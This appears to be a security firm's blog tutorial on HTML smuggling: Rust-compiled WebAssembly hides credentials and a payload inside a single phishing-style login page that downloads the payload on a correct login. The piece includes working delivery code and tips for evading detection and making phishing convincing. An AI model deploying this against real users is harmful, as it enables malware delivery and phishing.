Skip content
LRQA Cyber Labs

Next Level Smuggling with WebAssembly

Mike Bone Senior Software Developer

githubGitHub: wasm-smuggler


Background

HTML smuggling remains one of the most reliable ways to deliver malicious payloads into an environment during social engineering attacks, deploying benign looking files or payloads to users through an equally harmless looking web page – which of course can then execute harmful functionality.

One of the core benefits of HTML smuggling lies within the ability to embed the payload entirely inside a HTML page. This requires no extra requests, server downloads or any other networking that could be inspected, tracked and blocked.

There are many effective ways to hide a payload on a page which is visited by unsuspecting users. Commonly, these have included Base64 encoding or RC4 encryption, obfuscation techniques like string splitting or character substitution, or even HTML5 storage utilising local or session storage to hide and then later reconstruct payloads. 

However, as the world wide web evolves, “web3” becomes more popular, and security measures get more effective, there are both opportunities and requirements for new techniques. This article shows how WebAssembly (WASM) can be used for HTML smuggling.

 

WebAssembly (WASM)

WASM is a binary instruction format designed as a portable compilation target for programming languages such as C/C++, C# and Rust. It provides a way to run code in these languages at near-native speed, while complementing JavaScript and leveraging its web capabilities. Essentially, developers can write code for the browser in these languages and compile them to WASM files which in turn can then be loaded by a web page and their functions invoked.

So, why does this benefit HTML smuggling? The most obvious answer, and the one we will focus on, is the obfuscation and stealth that WASM provides and can therefore  be used for smuggling malicious payloads. As a binary format,  WASM inherently makes reading, detecting threats, or reverse-engineering far more difficult compared to JavaScript. The only comparable option within JavaScript is leveraging V8 Bytecode, but this has pitfalls, such as requiring the exact same V8 version used to compile the Bytecode, as for execution on the target system.

 

WASM Smuggler Concept

For our example, we will make use of wasm-pack; a tool for creating rust-generated WASM that interoperates with JavaScript nicely. The flow we will create is a simple username and password login page that will validate only for specific credentials configured client-side, and on success automatically download a malicious payload. We will have validation and payload generation all within the Rust WASM, to maximise obfuscation. Additionally, we will make this a single HTML file that contains everything we need for easily serving to users, and to avoid those unnecessary extra network requests.

This tutorial will assume some basic knowledge of Rust including getting Rust & wasm-pack installed.

RUST

First, we need to write the rust code that will be converted into WASM. The minimum we need to consider is:

  1. Defining the accepted credentials to verify against.
  2. Validating user input against the accepted credentials.
  3. Setting the payload that will be downloaded on success.

For simplicity, we can store the username, password and the payload all as static strings at the top of src/lib.rs in a newly created rust project with a library target (cargo init –lib wasm). To ensure no issues with encoding, we will store them all in Base64. 

// "myusername"

static USERNAME: &str = "bXl1c2VybmFtZQ==";

// "mypassword"

static PASSWORD: &str = "bXlwYXNzd29yZA==";

// The payload

static PAYLOAD: &str = "R290ZW0hCg==";

We then need a function that can validate the user credentials. It needs to receive the username and password from the JavaScript side and then on successful validation, it can return the payload as a stored Base64 string:

pub async fn validate_user(u: &str, p: &str) -> String {

    let username_vec: Vec<u8> = base64::decode(USERNAME).expect("Failed to decode");

    let username_string: String = str::from_utf8(&username_vec).unwrap().to_string();

    let password_vec: Vec<u8> = base64::decode(PASSWORD).expect("Failed to decode");

    let password_string: String = str::from_utf8(&password_vec).unwrap().to_string();

 

    if u != username_string || p != password_string {

        return "".to_string();

    }

 

    return PAYLOAD.to_string();

}

To make the function accessible from the JavaScript side, we need to expose it. This can be achieved by annotating the function with #[wasm_bindgen] to let wasm-pack know our intention:

#[wasm_bindgen]

pub async fn validate_user(u: &str, p: &str) -> String {

This will be enough Rust code to get our concept working. Finally, ensure the right imports are included at the top of the file:

use std::str;

use wasm_bindgen::prelude::*;

Define dependencies within the Cargo.toml:

[dependencies]

wasm-bindgen = "0.2"

wasm-bindgen-futures = "0.4"

base64 = "0.13"

Set the crate-type so that the library can be compiled for WebAssembly:

[lib]

crate-type = ["cdylib"]

Then, use wasm-pack to build it:

wasm-pack build --target no-modules --release

Specifying --release gives build optimisations with no debug assertions. There are a few targets to choose from, but no-modules provides an easy way for us to incorporate it into a single "all-in-one" .html page. This command outputs to /pkg that contains several files but the two we will focus on are the .wasm and .js files. Inspecting the .wasm file showcases a good example of the obfuscation at hand (the "WebAssembly" plugin for VS Code provides a great WASM inspector), containing our Rust code with the "hidden" credentials and payload.

JavaScript

The accompanying JavaScript file generated in the /pkg folder is the necessary helper script that will allow us to easily leverage the WASM in our HTML page. Because we chose --target no-modules, this contains a single global scope variable wasm_bindgen that we use to destructure our exposed WASM functions, followed by an IIFE (immediately invoked function expression) that defines it. 

However, if we want to include all of this inside the script tags of our singe file HTML page then we need to make one adjustment. By default, the __wbg_init function in the helper JavaScript file loads the WASM by trying to fetch the .wasm file and loading it into memory.

Instead, we can embed the .wasm file as a Base64 string and set the input to a buffer array of bytes from the Base64 instead.

async function __wbg_init(input) {

  if (wasm !== undefined) return wasm;

 

  const imports = __wbg_get_imports();

  const base64Wasm = "{{BASE64_ENCODED_WASM}}";

 

  function base64ToArrayBuffer(base64) {

    var binary_string = window.atob(base64);

    var len = binary_string.length;

    var bytes = new Uint8Array(len);

    for (var i = 0; i < len; i++) {

      bytes[i] = binary_string.charCodeAt(i);

    }

    return bytes.buffer;

  }

 

  if (typeof input === "undefined") {

    input = base64ToArrayBuffer(base64Wasm);

  }

  __wbg_init_memory(imports);

 

  const { instance, module } = await __wbg_load(await input, imports);

  return __wbg_finalize_init(instance, module);

}

Now we have the JavaScript that in turns loads the WASM and it is all self-contained and ready to be put inside a script tag of a HTML page, but we still need to actually make use of it. 

The rest of the JavaScript is straightforward - we need to execute a function on a button press which takes the username and password form input and verifies it with the WASM function we created to confirm credentials. On success we'll get the payload string back which we can then download as a file to the unsuspecting user's computer. Again, we can destructure the exposed WASM functions from the global wasm_bindgen that the helper JavaScript gave us  - which should first be copied and placed at the top of our script.

// Destructure the validate user function from the WASM

const { validate_user } = wasm_bindgen;

 

// Base64 to array buffer function

function b642ab(base64) {

  var binary_string = window.atob(base64);

  var len = binary_string.length;

  var bytes = new Uint8Array(len);

  for (var i = 0; i < len; i++) {

    bytes[i] = binary_string.charCodeAt(i);

  }

  return bytes.buffer;

}

 

document.addEventListener("DOMContentLoaded", function () {

  document.querySelector("form").addEventListener("submit", async function (event) {

    // Prevent default form submission behavour

    event.preventDefault();

 

    // Get user input

    const user = document.getElementById("username").value;

    const pass = document.getElementById("password").value;

 

    // Validate user and password - if successful then file base64 is returned

    await wasm_bindgen();

    const fileb64 = await validate_user(user, pass);

 

    if (fileb64 !== "") {

      // Convert base64 to blob

      const data = b642ab(fileb64);

      const blob = new Blob([data], { type: "application/octet" });

      const filename = "gotem.txt"

 

      // Download the blob

      if (window.navigator && window.navigator.msSaveOrOpenBlob) {

        window.navigator.msSaveBlob(blob, filename);

      } else {

        const a = document.createElement("a");

        document.body.appendChild(a);

        a.style = "display: none";

        const url = window.URL.createObjectURL(blob);

        a.href = url;

        a.download = filename;

        a.click();

        window.URL.revokeObjectURL(url);

      }

    }

  });

});

With a functioning HTML form along with the appropriate IDs set up for the username field, password field and submit button, we should have a working smuggler that upon valid credential entry downloads our malicious payload all hidden within the Rust generated WASM!

 

Summary

This is a very basic example, and just a functioning concept of using WASM in a HTML smuggler, but at this point serving the fully constructed HTML page and entering the correct credentials should result in the “payload” being downloaded. Looking at the source code of the HTML page, even with it not being minified and obfuscated, doesn’t reveal much, with the most egregious section being the large Base64 encoded WASM section. Even upon decoding this, we are left dealing with complex WASM code. All in all, the payload and any other content that is required to be hidden are deeply obfuscated away, making it much harder for anyone (or anything) to detect and prevent the malicious content before it is too late.

The full source code used in this article can be downloaded from our GitHub below.

githubGitHub: wasm-smuggler

 

Improvements

There are many improvements that could be made to enhance these features and functionality to make it more robust, such as:

HTML Page

One of the most obvious improvements would be to the HTML page itself. Some feedback on the form, both on incorrect login with some form validation but also on correct login showing some new “post login” content. Additionally, there could be loading animations and delay added to better simulate logging in, theming to replicate impersonating whatever’s needed for successful phishing etc. All in all, it needs to be believable to the user, so they don’t second guess a single part of the page.

Cargo Options

You could make use of some cargo file options for the Rust code, such as setting strip = true to remove symbols and debug info from the binary or looking into trim-paths to sanitise absolute paths introduced during compilation that could leave identifiable information in the compiled library.

Build Targets

The wasm-pack web build target offers more wasm-bindgen features than no-modules, giving more flexibility with what you can do. However, this would require some code changes to keep the “single HTML page” smuggler concept.

Further Obfuscation

Not only could the JavaScript be minified and obfuscated before being placed within the script tags of the HTML file, but the exposed WASM function names could be obfuscated too. Additionally, other details like the payload filename could be hidden within the WASM instead of having something like .exe searchable within the HTML source, and then all the stored info with the WASM could be further hidden with RC4 encryption where the decrypt key is fetched from a server.

Error Handling

There is plenty of scope to improve error handling within the Rust code and the flow of the JavaScript, handling cases like no user input or gracefully failing if there is a problem with an exposed WASM function, etc.

And More

Success/failure web bugs, user agent filtering - there is so much more that could be included!

Latest Cyber Labs articles